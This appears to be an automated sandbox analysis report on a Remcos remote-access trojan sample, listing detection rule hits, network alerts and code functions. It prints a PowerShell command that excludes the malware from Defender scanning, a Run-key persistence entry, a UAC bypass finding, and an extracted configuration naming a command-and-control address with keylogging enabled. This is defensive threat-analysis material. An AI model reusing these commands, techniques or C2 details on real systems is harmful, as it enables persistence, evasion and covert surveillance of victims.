                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iGhDjzEiDU.exe", ParentImage: C:\Users\user\Desktop\iGhDjzEiDU.exe, ParentProcessId: 6984, ParentProcessName: iGhDjzEiDU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", ProcessId: 1740, ProcessName: powershell.exe
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
                Sigma detected: Suspect Svchost Activity
                Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7248, ProcessName: svchost.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Graias\graias.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\iGhDjzEiDU.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-O844B9
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iGhDjzEiDU.exe", ParentImage: C:\Users\user\Desktop\iGhDjzEiDU.exe, ParentProcessId: 6984, ParentProcessName: iGhDjzEiDU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", ProcessId: 1740, ProcessName: powershell.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7248, ProcessName: svchost.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iGhDjzEiDU.exe", ParentImage: C:\Users\user\Desktop\iGhDjzEiDU.exe, ParentProcessId: 6984, ParentProcessName: iGhDjzEiDU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", ProcessId: 1740, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7248, ProcessName: svchost.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: CC 5F EF 95 52 EC 1E E1 CA 3B DB 36 C6 90 98 6F F2 B2 EE 7D D9 55 DE 98 DA B0 14 BE 23 8B B2 A6 5E C6 CF 30 9C 82 F7 90 AE DF 71 5A C6 2D 2B ED 3E 5C 1B A5 E3 5D AE 39 5E 59 31 08 F4 CA E6 2B BA 34 A0 37 84 D9 A7 16 09 0E C6 14 B2 0C FB 58 78 BA B3 DF 78 0D 8C 08 09 07 A7 A5 D5 53 48 D3 1B 9D , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, ProcessId: 7188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O844B9\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T00:02:01.636826+010020327761Malware Command and Control Activity Detected192.168.2.449733185.234.72.2154444TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T00:02:02.270456+010020327771Malware Command and Control Activity Detected185.234.72.2154444192.168.2.449733TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-04T00:02:03.166741+010028033043Unknown Traffic192.168.2.449735178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: iGhDjzEiDU.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeAvira: detection malicious, Label: HEUR/AGEN.1309540
                Found malware configuration
                Source: 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeReversingLabs: Detection: 71%
                Multi AV Scanner detection for submitted file
                Source: iGhDjzEiDU.exeReversingLabs: Detection: 71%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: iGhDjzEiDU.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_0043294A
                Source: iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f5ba9315-5

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406764 _wcslen,CoGetObject,5_2_00406764
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: iGhDjzEiDU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: iGhDjzEiDU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B43F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C79
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040AE51 FindFirstFileW,FindNextFileW,38_2_0040AE51
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,39_2_00407EF8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,41_2_00407898
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00406F06
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppDataJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49733 -> 185.234.72.215:4444
                Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 185.234.72.215:4444 -> 192.168.2.4:49733
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.234.72.215
                Source: global trafficTCP traffic: 192.168.2.4:49733 -> 185.234.72.215:4444
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49735 -> 178.237.33.50:80
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00426107 recv,5_2_00426107
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let 